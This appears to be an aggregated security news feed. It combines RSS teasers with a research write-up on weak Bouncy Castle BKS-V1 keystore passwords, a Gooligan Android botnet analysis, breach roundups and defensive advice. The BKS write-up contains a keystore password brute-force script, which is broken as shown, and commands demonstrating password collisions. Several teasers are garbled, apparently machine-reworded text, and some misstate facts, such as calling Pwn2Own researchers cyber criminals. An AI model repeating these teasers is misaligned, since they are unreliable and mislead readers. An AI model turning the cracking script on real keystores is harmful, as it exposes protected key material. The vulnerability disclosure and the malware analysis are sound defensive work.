Want to have a VPN Server on Your Computer (Windows) Without setting up Any Software?

Windows has the added facility to work as a VPN server, even though this choice is undisclosed. This can work on both versions of Windows – Windows 8 and Windows 7. To enable this, the server makes use of the point-to-point tunneling protocol (PPTP.) This could be valuable for linking to your home system on

The post Want to have a VPN Server on Your Computer (Windows) Without setting up Any Software? appeared first on Hacker News Bulletin | Find the Latest Hackers News.

The Health insurance Company – Premera Blue Cross – of the United States of America was cyber criminally attacks and 11 million records were accessed

Pemera Blue Cross, a United States of America – based health insurance corporation, has confided in that its systems were infringed upon and their security and associability was breached when  cyber criminals hacked the company and made their way in 11 million of their customers’ records. It is the second cyber attack in a row

The post The Health insurance Company – Premera Blue Cross – of the United States of America was cyber criminally attacks and 11 million records were accessed appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Political analysts caution air plane connections systems that are susceptible to cyber attacks

Marketable and even martial planes have an Achilles heel that could abscond them as susceptible to cyber criminals on the ground, who specialists say could possibly seize cockpits and generate disorder in the skies. At the present, radical groups are thought to be short of the complexity to bring down a plane vaguely, but it

The post Political analysts caution air plane connections systems that are susceptible to cyber attacks appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Researcher makes $225,000, legally, by cyber attacking browsers

A single researcher who is actually a cyber criminal made $225,000 this week  – that too all by legal means! This cyber research hacker cyber criminally attacked browsers this past week. For the past two days, safety researchers have tumbled down on Vancouver for a Google – sponsored competition called Pwn – 2 – Own,

The post Researcher makes $225,000, legally, by cyber attacking browsers appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Vanished in 60 seconds! – Chinese cyber criminals shut down Adobe Flash, Internet Explorer

Associates of two Chinese cyber crime teams have hollowed out the best prizes at a main yearly hacking competition held in Vancouver, Canada. Cyber attackers at Pwn2Own, commenced in 2007, were triumphant in violating the security of broadly -used software including Adobe Flash, Mozilla’s Firefox browser, Adobe PDF Reader and Microsoft’s freshly – discontinued Internet

The post Vanished in 60 seconds! – Chinese cyber criminals shut down Adobe Flash, Internet Explorer appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Microsoft Remote Desktop Connection Manager

Imagine having the access and control to your computer to any place in the world from your iPhone. That would be really futuristic, no? Actually, this is not because there are applications available that can let you tap into your computer from on your mobile. These remote control applications do more than simply allow you

The post Microsoft Remote Desktop Connection Manager appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Anonymous wants to further its engagement in the exploration of space – ‘Unite as Species’

The hack – tivist cyber criminal group Anonymous, more often than not related with cyber campaigns in opposition to fraudulent government administrations and terrorist organizations, has now set its sights on space. They posted a video on the group’s most important You Tube channel on the 18th of March, and called on to everyone through

The post Anonymous wants to further its engagement in the exploration of space – ‘Unite as Species’ appeared first on Hacker News Bulletin | Find the Latest Hackers News.

The Curious Case of the Bouncy Castle BKS Passwords

While investigating BKS files, the path I went down led me to an interesting discovery: BKS-V1 files will accept any number of passwords to reveal information about potentially sensitive contents!

In preparation for my BSidesSF talk, I've been looking at a lot of key files. One file type that caught my interest is the Bouncy Castle BKS (version 1) file format. Like password-protected PKCS12 and JKS keystore files, BKS keystore files protect their contents from those who do not know the password. That is, a BKS file may contain only public information, such as a certificate. Or it may contain one or more private keys. But you won't know until after you use the password to unlock it.

Update March 21, 2018:
We have updated this blog post based on feedback from Thomas Pornin, and confirmation from the Bouncy Castle author. Like JKS files, BKS files do not protect the metadata of their contents by default. The keystore-level password and associated key is only used for integrity checking. By default, private keys are encrypted with the same password as the keystore. These private keys are not affected by the keystore-level weakness outlined in this blog post. That is, even if an unexpected password is accepted by a keystore itself, that same password will not be accepted to decrypt the private key contained within a keystore. Original wording in this blog post that is now understood to be inaccurate has been marked in strikeout notation for transparency.

Cracking BKS Files

As I investigated the first BKS file in my list, I quickly realized assumed that I could not determine what was contained in it unless I had the password. Naively searching the web for things like "bks cracker" and stopping there, I concluded that I'd need to roll my own BKS bruteforce cracker.

Update March 21, 2018:
Tools used to inspect BKS files will refuse to list the contents of the keystore if a valid password is not provided. However, this is actually not because the metadata of the keystore contents are protected. Because the metadata of the keystore contents are not encrypted, this information can be viewed without needing to use a valid password.

Using the pyjks library, I wrote a trivial script:

#!/usr/bin/env python3

import os
import sys
import jks

def trypw(bksfile, pw):
keystore = jks.bks.BksKeyStore.load(bksfile, pw)
if keystore:
print('Password for %s found: "%s"' % (bksfile, pw))
except jks.util.KeystoreSignatureException:
except UnicodeDecodeError:

with open(sys.argv[1]) as h:
pwlist = h.readlines()

for pw in pwlist:
trypw(sys.argv[2], pw.rstrip())

Let's try this on the test BKS file that I have:

$ python strings.txt test.bks
Password for test.bks found: "Redefinir senha"

Cool. "Redefinir senha" seems like an unexpected password to me, but it's not terrible in strength. It has 15 characters, and uses mixed-case and a non-alphanumeric character (a space). Depending on the password-cracking technique used, it could hold up pretty well to bruteforce attacks.

The above proof-of-concept script is quite slow, since it will serially attempt passwords, one at a time. Taking advantage of multi-core systems in Python isn't as easy as it should be, due to the Python GIL. As a simple test, I tried using the ProcessPoolExecutor to see if I could increase my password-attempt throughput. ProcessPoolExecutor side-steps the GIL by spreading the work across multiple Python processes. Each Python process has its own GIL, but because multiple Python processes are being used, this approach should help better utilize my multiprocessor system.

Let's try this version of the brute-force cracking tool:

$ python strings.txt test.bks
Password for test.bks found: "Redefinir senha"
Password for test.bks found: "Activity started without extras"
Password for test.bks found: ""

Wait, what is going on here? How can a single BKS file accept multiple passwords? As it turns out, there are two things going on:

First, when I optimized my BKS bruteforce script with the use of ProcessPoolExecutor, I didn't factor in how the script would behave when it is distributed across multiple processes. In the single-threaded instance above, the script exits as soon as it finds the password. However, when it's distributed across multiple processes using ProcessPoolExecutor, things are different. I didn't have any code to explicitly terminate the parent Python process or any of the forked Python processes. The impact of this is that my multi-process BKS cracking script will continue to make attempts after it finds the password.

The other thing that is happening is related to the BKS file format, which I discuss below.

Hashes and Collisions

When a resource is password-protected with a single password, it is extremely unlikely that another password can also be used to unlock the resource. Consider the simple case where a collision-resistant hash function is used to verify the password: Is this password unique?

Applying a cryptographic hash function to the password results in the following hashes:
MD5 (128-bit): 18fcfa801383d10dd0a1fea051674469
SHA-1 (160-bit): c9e2ef80e5f2afb8aef0d058182cc7f59e93e025
SHA-256 (256-bit): 08a6c455079687616e997c7bfd626ae754ba1a71b229db1b3a515cfa45e9d4ea

The MD5 hash algorithm, which has a digest size of 128 bits, was shown in 1996 to be unsafe if a collision-resistant hash is required. By 2005, researchers produced a pair of PostScript documents and a pair of X.509 certificates where each pair shared the same MD5 hash. While it takes a bit of CPU processing power to find such collisions, it's feasible to do so with modern computing hardware.

The SHA-1 hash algorithm, which has a digest size of 160 bits, is more resistant to collisions than MD5. However by February 2017, the first known SHA-1 collision was produced. This attack required "the equivalent processing power as 6,500 years of single-CPU computations and 110 years of single-GPU computations."

The SHA-256 hash algorithm, which has a digest size of 256 bits, is even more resistant to collisions than SHA-1. To date, no collisions have been found using the SHA-256 hashing algorithm.

BKS-V1 Files and Accidental Collisions

My naive BKS bruteforcing script produced three different passwords for the same BKS file. Let's look at the code for handling BKS files in pyjks:

hmac_fn = hashlib.sha1
hmac_digest_size = hmac_fn().digest_size
hmac_key_size = hmac_digest_size*8 if version != 1 else hmac_digest_size
hmac_key = rfc7292.derive_key(hmac_fn, rfc7292.PURPOSE_MAC_MATERIAL, store_password, salt, iteration_count, hmac_key_size//8)

Here we can see that the HMAC function is SHA-1, which isn't bad. However, it turns out that it's the HMAC key (and its size) that is important, since that's what determines whether the correct password has been provided to unlock the BKS keystore file. If the file is a BKS version 1 file, the hmac_key_size value will be the same as hmac_digest_size.

In the case of hashlib.sha1, the digest_size is 20 bytes (160 bits). But where it gets interesting is the derivation of hmac_key. The size of hmac_key is determined by hmac_key_size//8 (integer division, dropping any remainder). In this case, it's 20//8, which is 2 bytes (16 bits). Why is there integer division by 8 at all? It's not clear, but perhaps the developer confused where bits are used and bytes are used in the code.

Let's add a debugging print() statement to the component of pyjks and test our three different passwords for the same BKS keystore:

$ python -c "import jks; keystore = jks.bks.BksKeyStore.load('test.bks', 'Redefinir senha')"                                                                                                                       hmac_key: c019
$ python -c "import jks; keystore = jks.bks.BksKeyStore.load('test.bks', 'Activity started without extras')" hmac_key: c019
$ python -c "import jks; keystore = jks.bks.BksKeyStore.load('test.bks', '')" hmac_key: c019

Here we can see that the hmac_key value is c019 (hex) with each of the three different passwords that are provided. In each of the three cases, the BKS-V1 keystore is decrypted, despite the likelihood that not one of the three accepted passwords was the one chosen by the software developer.

Why was I accidentally able to find BKS-V1 password collisions due to my shoddy Python programming skills? The maximum entropy you get from any BKS-V1 password is only 16 bits. This is nowhere near enough bits to represent a password. When it comes to password strength, entropy can be used as a measure. If only bruteforce techniques are used, each case-sensitive Latin alphabet character adds 5.7 bits of entropy. So a randomly-chosen three-character,case-sensitive Latin alphabet password will have 17.1 bits of entropy, which already exceeds the complexity of what you can represent in 16 bits. In other words, while a developer can choose a reasonably-strong password to protect the contents integrity of a BKS-V1 file, the file format itself only supports complexity equivalent to just less than what is provided by a randomly-selected case-sensitive three-letter password.

Cracking BKS-V1 Files

What amount of integrity protection does a 16-bit hmac_key provide? Virtually nothing. 16 bits can only represent 65,536 different values. What this means is regardless of the password complexity the developer has chosen, a bruteforce password cracker needs to try at most 65,536 times. A high-end GPU these days can crunch through over 10 billion SHA-1 operations per second.

As it turns out John the Ripper does have BKS file support, despite what my earlier web searches turned up. While there isn't currently GPU support for cracking BKS files, a CPU is plenty fast enough. My limited testing has shown that any BKS-V1 file can be cracked in about 10 seconds or less using just a single CPU core on a modern system.

Conclusion and Recommendations

Without a doubt, BKS-V1 keystore files are insecure, due to insufficient HMAC key size. Although BKS files support password protection to protect their contents integrity, the protection supplied by version 1 of the file format is nearly zero. For these reasons, here are recommendations for developers who use Bouncy Castle:

  • Be sure to use Bouncy Castle version 1.47 or newer. This version, which was introduced on March 30, 2012, increases the default MAC of a BKS key store from 2 bytes to 20 bytes.

    This information has been in the release notes for Bouncy Castle for about six years, but it may have been overlooked because no CVE identifier was assigned to this weakness. Approximately 84% of the BKS files seen in Android applications are using the vulnerable version 1. We assigned CVE-2018-5382 to this issue to help ensure that it gets the attention it deserves.
  • On modern Bouncy Castle versions, do not use the "BKS-V1" format, which was added for legacy compatibility with Bouncy Castle version 1.46 and earlier.
  • If you have rely on password protection provided by BKS-V1 to protect private key material, these private keys should be considered compromised. Such keys should be regenerated and stored in a keystore that provides adequate protection against brute-force attacks, along with a sufficiently complex and long password. For BKS files that contain only public information, such as certificates, the weak password protection provided by version 1 of the format is not important.

For more details, please see CERT Vulnerability Note VU#306792.

The NIS Directive – just how tough is it really?

Over the last few months, UK media outlets have been filled with reports about the series of tough new measures being introduced on 9th May to protect our national critical infrastructure against cyber threats. In January, the government confirmed that UK critical infrastructure organisations may soon be liable for fines of up to £17m if they fail to implement robust cyber security measures, under its plans to implement the EU’s Network and Information Systems (NIS) Directive. But despite the tough talk, are the current proposals as rigorous as they sound?

In January, the government published its plans to implement the NIS Directive into UK law, following a public consultation. But despite the punitive penalty system, the response avoided making any hard recommendations and instead relies on a high level “appropriate and proportionate technical and organisational measures” regulatory approach of deferring responsibility to the National Cyber Security Centre (NCSC) and the Competent Authorities. Looking to the NCSC guidance, the series of measures it outlines are heavily weighted on reactive attack reporting rather than advising organisations on how to better shore up their perimeter with proactive defence solutions. As an example, within the guidance organisations are asked to define their own risk profile, and then prove their resiliency against that profile – the equivalent of being graded on a test you wrote yourself.

In this light, it’s unclear how the opportunity to set out a framework of minimum standards for CNI can be effectively achieved with the NIS Regulations. If the intended outcome is genuinely tied to resilience against cyber-attacks, then these essential services should be required to remain available during all but the most extreme cyber-attacks. The outcome described in the guidance points to merely the proper disclosure of failed protection and the swift recovery from that failure. My concern remains that implementation of the NIS Directive will be viewed as a mere “tick box” exercise which requires the bare minimum to be done, rather than allowing the UK to set world-leading standards in this area.

As a UK citizen, I fear that our government is failing to deliver on the promises outlined in its Digital Strategy, which pledged to make the UK “the safest place in the world to live and work online.” This is all deeply concerning, especially given that Ciaran Martin, the head of the NCSC, warned in January that it was a matter of “when, not if” the UK faces a major cyber-attack that might cripple infrastructure such as energy supplies or the financial services sector. Across all parts of critical national infrastructure, we are seeing a greater number of sophisticated and damaging cyber threats which are often believed to be the work of foreign governments seeking to cause political upheaval. Last year’s DDoS attacks against the transport network in Sweden caused train delays and disrupted travel services, while the WannaCry ransomware attacks last May demonstrated the capacity for cyber-attacks to impact people’s access to essential services. Only this month, we have seen a surge in record-breaking DDoS attacks that exploit the Memcached vulnerability.

As the draft NIS Regulations become UK law, we have a golden opportunity to improve the UK’s cyber security posture. Let’s hope we can still seize this moment and build an eco-system that genuinely protects our critical infrastructure against today’s cyber-attacks.

These Best Practices Will Stop 90% Of The Cyber Threat

The leadership of our consultancy Crucial Point have been working to enhance the security posture and mitigate cyber risks for over a decade, successfully operating across multiple sectors of the economy to help leaders thwart dynamic adversaries. In doing so we have found most businesses can take steps to raise defenses before calling in the experts.

The nine steps below, taken from the Crucial Point Best Cybersecurity Practices page, can help kickstart the defense of any firm.

These steps are:

  1. Use a “framework” that will guide your action. Our favorite one is the NIST Cybersecurity Framework, but there are many. This framework will help guide your policies, procedures, contracting and incident response.
  2. Work to know the threat. Knowing the cyber threat will help you more rapidly and economically adjust your defenses. We wrote a book to help you do this. Find it at: The Cyber Threat
  3. Think of your nightmare scenarios. Only you know your business and only you can really know what could go wrong if the worse happens. Use these nightmare scenarios to help determine what your most important data is, this is going to help prioritize your defensive actions.
  4. Ensure you and your team are patching operating systems and applications. This sounds so basic, and it is so basic. But it is too frequently overlooked and it gets companies hacked, again and again. So don’t just assume it is going on. Check it.
  5. Put multi-factor authentication in place for every employee. Depending on your business model, you may need to do this for customers and suppliers too. This is very important for a good defense.
  6. Block malicious code. This is easier said than done, but work to put a strategy in place that ensures only approved applications can be installed in your enterprise, and, even though anti-virus solutions are not comprehensive, ensure you have them in place and keep them up to date.
  7. Design to detect and respond to breach. This means put monitoring in place and also use proper segmentation of your systems so an adversary has a harder time moving around.
  8. Encrypt your data. And back it up!
  9. Prepare for the worse. Know what your incident response plan is and make sure it is well documented and reviewed. Ensure it includes notification procedures.

Those are just the first few steps. But please put them in place!  By following community best practices you can make an immediate difference in your own security posture. These are, for the most part, things you can do yourself for very little cost.

To accelerate your implementation of these best practices, or to independently verify and validate your security posture and receive detailed action plans for improvement, contact Crucial Point here and ask about our CISO-as-a-Service offering.

The post These Best Practices Will Stop 90% Of The Cyber Threat appeared first on The Cyber Threat.

Tax Phishing Scams Are Back: Here Are 3 to Watch Out For

This Year’s Crop of Tax Phishing Scams Target Individuals, Employers, and Tax Preparers

Tax season is stressful enough without having to worry about becoming the victim of a cyber crime. Here are three different tax phishing scams targeting employers, individuals, and even tax preparers that are currently making the rounds.

This Year's Crop of Tax Phishing Scams Target Individuals, Employers, and Tax Preparers

Employers: W-2 Phishing Emails

The W-2 phishing scams that have plagued employers for a couple of years are back with a vengeance. The IRS noticed a significant uptick in these tax phishing scams beginning in January and recently issued an official warning. Also known as spear phishing or business email compromise (BEC) scams, these campaigns differ from traditional phishing scams in that they are highly targeted. They are sent to specific employees within organizations who have access to employee tax data, usually human resources personnel, and often appear to come from a company executive. Occasionally, the IRS reports, the email will request a wire transfer along with employee W-2 data.

Individuals: Phony “Tax Notification” Emails

While the hackers behind this particular scam are not seeking tax ID data, they are harnessing the stress of tax season and victims’ fear of the IRS to get them to click on phishing links. The targets are Microsoft 365 users, and Dark Reading reports that “tens of millions” may have received the emails. The messages purport to be from the IRS, warn recipients that there is some sort of problem with their taxes and that dire consequences will result if they do not take immediate action, and include attachments with names such as “taxletter.doc.” Downloading and opening the attachment installs password-stealing malware on the victim’s machine.

Tax Preparers and Individuals: New Tax ID Theft Phishing Scheme

These highly sophisticated tax phishing scams are executed in two phases. In the first phase, hackers send traditional or spear phishing emails to tax preparers, which install malware on their computers and allow the hackers to steal client tax and bank account data.

In the second phase, the hackers use the data to file fraudulent tax returns – then have IRS refunds deposited in the victims’ bank accounts. In some cases, the return is filed using one victim’s tax data and the money deposited in another victim’s bank account. The bank account owners are then contacted by someone claiming to be an IRS representative, demanding that they take specific (and irreversible) steps to “return” the money.

Fighting Back Against Tax Phishing Scams

There are several ways to prevent falling victim to these and other tax phishing scams. Organizations should ensure that all employees are trained to identify phishing emails, including spear phishing, have a specific and clear procedure to report suspicious emails, and take all other appropriate proactive cyber security measures. Individuals should also be aware of the warning signs of a phishing email, including text written in broken English and return addresses that appear to be off, such as a government agency with a .com address.

The IRS requests that suspected tax-related phishing emails be forwarded to If you receive an erroneous refund deposit to your bank account, follow the IRS’s instructions for returning it:

  1. Contact the Automated Clearing House (ACH) department of the bank/financial institution where the direct deposit was received and have them return the refund to the IRS.
  2. Call the IRS toll-free at 800-829-1040 (individual) or 800-829-4933 (business) to explain why the direct deposit is being returned.
  3. Interest may accrue on the erroneous refund.

The cyber security experts at Lazarus Alliance have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting organizations of all sizes from security breaches. Our full-service risk assessment services and Continuum GRC RegTech software will help protect your organization from data breaches, ransomware attacks, and other cyber threats.

Lazarus Alliance is proactive cyber security®. Call 1-888-896-7580 to discuss your organization’s cyber security needs and find out how we can help your organization adhere to cyber security regulations, maintain compliance, and secure your systems.

The post Tax Phishing Scams Are Back: Here Are 3 to Watch Out For appeared first on .

Employees Are Biggest Threat to Healthcare Data Security

Two new reports illustrate the threat of employee carelessness and maliciousness to healthcare data security

Healthcare data security is under attack from the inside. While insider threats – due to employee error, carelessness, or malicious intent – are a problem in every industry, they are a particular pox on healthcare data security. Two recent reports illustrate the gravity of the situation.

Two new reports illustrate the threat of employee carelessness and maliciousness to healthcare data security

Verizon’s 2018 Protected Health Information Data Breach Report, which examined 1,368 healthcare data security incidents in 27 countries (heavily weighted towards the U.S.), found that:

  • 58% of protected health information (PHI) security incidents involved internal actors, making healthcare the only industry where internal actors represent the biggest threat to their organizations.
  • About half of these incidents were due to error or carelessness; the other half were committed with malicious intent.
  • Financial gain was the biggest driver behind intentional misuse of PHI, accounting for 48% of incidents. Unauthorized snooping into the PHI of acquaintances, family members, or celebrities out of curiosity or for “fun” was second (31%).
  • Over 80% of the time, insiders who intentionally misused PHI didn’t “hack” anything; they simply used their existing credentials or physical access to hardware (such as access to a laptop containing PHI).
  • 21% of PHI security incidents involved lost or stolen laptops containing unencrypted data.
  • In addition to PHI breaches, ransomware continues to plague healthcare data security; 70% of incidents involving malicious code were ransomware attacks.

Meanwhile, a separate survey on healthcare data security conducted by Accenture found that nearly one in five healthcare employees would be willing to sell confidential patient data to a third party, and they would do so for as little as $500 to $1,000. Even worse, nearly one-quarter reported knowing “someone in their organization who has sold their credentials or access to an unauthorized outsider.”

Combating Insider Threats to Healthcare Data Security

Healthcare data security is especially tricky because numerous care providers require immediate and unrestricted access to patient information to do their jobs. Any hiccups along the way could result in a dead or maimed patient. However, there are proactive steps healthcare organizations can take to combat insider threats:

  • Establish written acceptable use policies clearly outlining who is allowed to access patient health data and when, and the consequences of accessing PHI without a legitimate reason.
  • Back up these policies with routine monitoring for unusual or unauthorized user behavior; always know who is accessing patient records.
  • Restrict system access as appropriate, and review user access levels on a regular basis.
  • Don’t forget to address the physical security of hardware, such as laptops.

The cyber security experts at Continuum GRC have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting your organization from security breaches. Continuum GRC offers full-service and in-house risk assessment and risk management subscriptions, and we help companies all around the world sustain proactive cyber security programs.

Continuum GRC is proactive cyber security®. Call 1-888-896-6207 to discuss your organization’s cyber security needs and find out how we can help your organization protect its systems and ensure compliance.

The post Employees Are Biggest Threat to Healthcare Data Security appeared first on .

Taking down Gooligan: part 2 — inner workings

This post provides an in-depth analysis of the inner workings of Gooligan, the infamous Android OAuth stealing botnet.

This is the second post of a series dedicated to the hunt and takedown of Gooligan that we did at Google, in collaboration with Check Point, in November 2016. The first post recounts Gooligan’s origin story and provides an overview of how it works. The final post discusses Gooligan’s various monetization schemas and its take down. As this post builds on the previous one , I encourage you to read it, if you haven’t done so already.

This series of posts is modeled after the talk I gave at Botconf in December 2017. Here is a re-recording of the talk:

You can also get the slides here but they are pretty bare.


Initially, users are tricked into installing Gooligan’s staging app on their device under one false pretense or another. Once this app is executed, it will fully compromise the device by performing the five steps outlined in the diagram below:

Googligan infection process

As emphasized in the chart above, the first four stages are mostly borrowed from Ghost Push . Gooligan authors main addition is the code needed to instrument the Play Store app using a complex injection process. This heavy code reuse initially made it difficult for us to separate Ghost Push samples from Gooligan ones. However, as soon as we had the full kill chain analyzed, we were able to write accurate detection signatures.

Payload decoding

Most Gooligan samples hide their malicious payload in a fake image located in assets/close.png. This file is encrypted with a hardcoded [XOR encryption] function. This encryption is used to escape the signatures that detect the code that Gooligan borrows from previous malware. Encrypting malicious payload is a very old malware trick that has been used by Android malware since at least 2011.

Gooligan initial payload file structure

Besides its encryption function, one of the most prominent Gooligan quirks is its weird (and poor) integrity verification algorithm. Basically, the integrity of the close.png file is checked by ensuring that the first ten bytes match the last ten. As illustrated in the diagram above, the oddest part of this schema is that the first five bytes (val 1) are compared with the last five, while bytes six through ten (val 2) are compared with the first five.

Phone rooting

Gooligan initial payload file structure

As alluded to earlier, Gooligan, like Snappea and Ghostpush, weaponizes the Kingroot exploit kit to gain root access. Kingroot operates in three stages: First, the malware gathers information about the phone that are sent to the exploit server. Next, the server looks up its database of exploits (which only affect Android 3.x and 4.x) and builds a payload tailored for the device. Finally, upon payload reception, the malware runs the payload to gain root access.

The weaponization of known exploits by cyber-criminals who lack exploit development capacity (or don't want to invest into it) is as old as crimeware itself. For example, DroidDream exploited Exploid and RageAgainstTheCage back in 2011. This pattern is common across every platform. For example, recently NSA-leaked exploit Eternal Blue was weaponized by the fake ransomware NoPetya. If you are interested in ransomware actors, check my posts on the subject.

Persistence setup

Upon rooting the device, Gooligan patches the script to ensure that it will survive a factory reset. This resilience mechanism was the most problematic aspect of Gooligan, from a remediation perspective, because for the oldest devices, it only left us with OTA (over the air) update and device re-flashing as a way to remove it. This situation was due to the fact that very old devices don't have verified boot , as it was introduced in Android 4.4.

Android recovery

This difficult context, combined with the urgent need to help our users, led us to resort to a strategy that we rarely use: a coordinated takedown. The goal of this takedown was to disable key elements of the Gooligan infrastructure in a way that would ensure that the malware would be unable to work or update. As discussed in depth at the end of the post, we were able to isolate and take down Gooligan’s core server in less than a week thanks to a wide cross-industry effort. In particular, Kjell from the NorCert worked around the clock with us during the Thanksgiving holidays (thanks for all the help, Kjell!).

Play store app manipulation

The final step of the infection is the injection of a shared library into the Play store app. This shared library allows Gooligan to manipulate the Play store app to download apps and inject review.

We traced the injection code back to publicly shared code . The library itself is very bare: the authors added only the code needed to call Play store functions. All the fraud logic is in the main app, probably because the authors are more familiar with Java than C.

Impacted devices


Geo distribution of devices impacted by Gooligan

Looking at the set of devices infected during the takedown revealed that most of the affected devices were from India, Latin America, and Asia, as visible in the map above. 19% of the infections were from India, and the top eight countries affected by Gooligan accounted for more than 50% of the infections.


Phone maker distribution for devices impacted by Gooligan

In term of devices, as shown in the barchart above, the infections are spread across all the big brands, with Samsung and Micromax being unsurprisingly the most affected given their market share. Micromax is the leading Indian phone maker, which is not very well known in the U.S. and Europe because it has no presence there. It started manufacturing Android One devices in 2014 and is selling in quite a few countries besides India, most notably Russia.


Initial clue

Gooligan HAproxy configuration

Buried deep inside Gooligan patient zero code, Check Point researchers Andrey Polkovnichenko , Yoav Flint Rosenfeld , and Feixiang He , who worked with us during the escalation, found the very unusual text string oversea_adjust_read_redis. This string led to the discovery of a Chinese blog post discussing load balancer configuration, which in turn led to the full configuration file of Gooligan backend services.

#Ads API
        acl is_ads path_beg /overseaads/
        use_backend overseaads if is_ads

#Payment API
        acl is_paystatis path_beg /overseapay/admin/
        use_backend overseapaystatis if is_paystatis

# Play install
        acl is_appstore path_beg /appstore/
        use_backend overseapaystatis if is_appstore

Analyzing the exposed HAproxy configuration allowed us to pinpoint where the infrastructure was located and how the backend services were structured. As shown in the annotated configuration snippet above, the backend had API for click fraud, receiving payment from clients, and Play store abuse. While not visible above, there was also a complex admin and statistic-related API.


Gooligan infrastructure

Combining the API endpoints and IPs exposed in the HAproxy configuration with our knowledge of Gooligan binary allowed us to reconstruct the infrastructure charted above. Overall, Gooligan was split into two main data centers: one in China and one overseas in the US, which was using Amazon AWS IPs. After the takedown, all the infrastructure ended up moving back to China.

Note: in the above diagram, the Fraud end-point appears twice. This is not a mistake: at Gooligan peak, its authors splited it out to sustain the load and better distribute the requests.


So, who is behind Gooligan? Based on this infrastructure analysis and other data, we strongly believe that it is a group operating from mainland China. Publicly, the group claims to be a marketing company, while under the hood it is mostly focused on running various fraudulent schema. The apparent authenticity of its front explains why some reputable companies ended up being scammed by this group. Bottom line: be careful who you buy ads or install from: If it is too good to be true...

In the final post of the serie, I discusses Gooligan various monetization schemas and its takedown. See you there!

Thank you for reading this post till the end! If you enjoyed it, don’t forget to share it on your favorite social network so that your friends and colleagues can enjoy it too and learn about Gooligan.

To get notified when my next post is online, follow me on Twitter , Facebook , Google+ , or LinkedIn . You can also get the full posts directly in your inbox by subscribing to the mailing list or via RSS .

A bientôt!

Weekly Cyber Risk Roundup: Russia Sanctions, Mossack Fonseca Shutdown, Equifax Insider Trading

On Thursday, the U.S. government imposed sanctions against five entities and 19 individuals for their role in “destabilizing activities” ranging from interfering in the 2016 U.S. presidential election to carrying out destructive cyber-attacks such as NotPetya, an event that the Treasury department said is the most destructive and costly cyber-attack in history.

“These targeted sanctions are a part of a broader effort to address the ongoing nefarious attacks emanating from Russia,” said Treasury Secretary Steven T. Mnuchin in a press release. “Treasury intends to impose additional CAATSA [Countering America’s Adversaries Through Sanctions Act] sanctions, informed by our intelligence community, to hold Russian government officials and oligarchs accountable for their destabilizing activities by severing their access to the U.S. financial system.”

Nine of the 24 entities and individuals named on Thursday had already received previous sanctions from either President Obama or President Trump for unrelated reasons, The New York Times reported.

In addition to the sanctions, the Department of Homeland Security and the FBI issued a joint alert warning that the Russian government is targeting government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.

According to the alert, Russian government cyber actors targeted small commercial facilities’ networks with a multi-stage intrusion campaign that staged malware, conducted spear phishing attacks, and gained remote access into energy sector networks. The actors then used their access to conduct network reconnaissance, move laterally, and collect information pertaining to Industrial Control Systems.


Other trending cybercrime events from the week include:

  • Sensitive data exposed: Researchers discovered a publicly accessible Amazon S3 bucket belonging to the Chicago-based jewelry company MBM Company Inc. that exposed the personal information of more than 1.3 million people. About 3,000 South Carolina recipients of the Palmetto Fellows scholarship had their personal information exposed online for over a year due to a glitch when switching programs. The Dutch Data Protection Authority accidentally leaked the names of some of its employees due to not removing metadata from more than 800 public documents.
  • State data breach notifications: ABM Industries is notifying clients of a phishing incident that may have compromised their personal information. Chopra Enterprises is notifying customers that payment cards used on its ecommerce site may have been compromised. Neil D. DiLorenzo CPA is notifying clients of unauthorized access to a system that contained files related to tax returns, and several clients have reported fraudulent activity related to their tax returns. NetCredit is warning a small percentage of customers that an unauthorized party used their credentials to access their accounts.
  • Other data breaches: A misconfiguration at Florida Virtual School led to the personal information of  368,000 students as well as thousands of former and current Leon County Schools employees being compromised. Okaloosa County Water and Sewer said that individuals may have had their payment card information stolen due to a breach involving external vendors that process credit and debit card payments.  The Nampa School District said that an email account compromise may have compromised the personal information of 3,983 current and past employees. A cyber-attack at the Port of Longview may have exposed the personal information of 370 current and former employees as well as 47 vendors.
  • Arrests and legal actions: A Maryland Man was sentenced to 12 years in prison for his role in a multi-million dollar identity theft scheme that claimed fraudulent tax refunds over a seven-year period. The owner of Smokin’ Joe’s BBQ in Missouri has been charged with various counts related to the use of stolen credit cards. Svitzer said that 500 employees are impacted by the discovery of three employee email accounts in finance, payroll, and operations were auto-forwarding emails outside of the company for nearly 11 months without the company’s knowledge.
  • Other notable events: Up to 450 people who filed reports with Gwent Police over a two-year period had their data exposed due to security flaws in the online tool, and those people were never notified that their data may have been compromised. A security flaw on a Luxembourg public radio station may have exposed non-public information.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week

2018-03-17_RiskScoresTwo of the largest data breaches of recent memory were back in the news this week due to Mossack Fonseca announcing that it is shutting down following the fallout from the Panama Papers breach as well as a former Equifax employee being charged with insider trading related to its massive breach.

Documents stolen from the Panamanian law firm Mossack Fonseca and leaked to the media in April 2016 were at the center of the scandal known as the Panama Papers, which largely revealed how rich individuals around the world were able to evade taxes in various countries.

“The reputational deterioration, the media campaign, the financial circus and the unusual actions by certain Panamanian authorities, have occasioned an irreversible damage that necessitates the obligatory ceasing of public operations at the end of the current month,” Mossack Fonseca wrote in a statement.

While Mossack Fonseca’s data breach appears to have finally led to the organization shutting down, Equifax’s massive breach announcement in September 2017 has since sparked a variety of regulatory questions, as well as criticism of the company’s leadership and allegations of insider trading.

Last week the SEC officially filed a complaint that alleges that Jun Ying, who was next in line to be the company’s global CIO, conducted insider trading by using confidential information entrusted to him by the company to conclude Equifax had suffered a serious breach, and Ying then exercised all of his vested Equifax stock options and sold the shares in the days before the breach was publicly disclosed.

“According to the complaint, by selling before public disclosure of the data breach, Ying avoided more than $117,000 in losses,” the SEC wrote in a press release.

Ying also faces criminal charges from the U.S. Attorney’s Office for the Northern District of Georgia.

Google’s new Gaming Venture: A New Player?

Google in Gaming – Facts and Speculation In January 2018, game industry veteran Phil Harrison announced that he was joining Google as a Vice President and GM. With Harrison’s long history of involvement with video game companies – having previously worked with Sony and Microsoft’s Xbox division – this immediately prompted speculation and rumours about […]

Marketing “Dirty Tinder” On Twitter

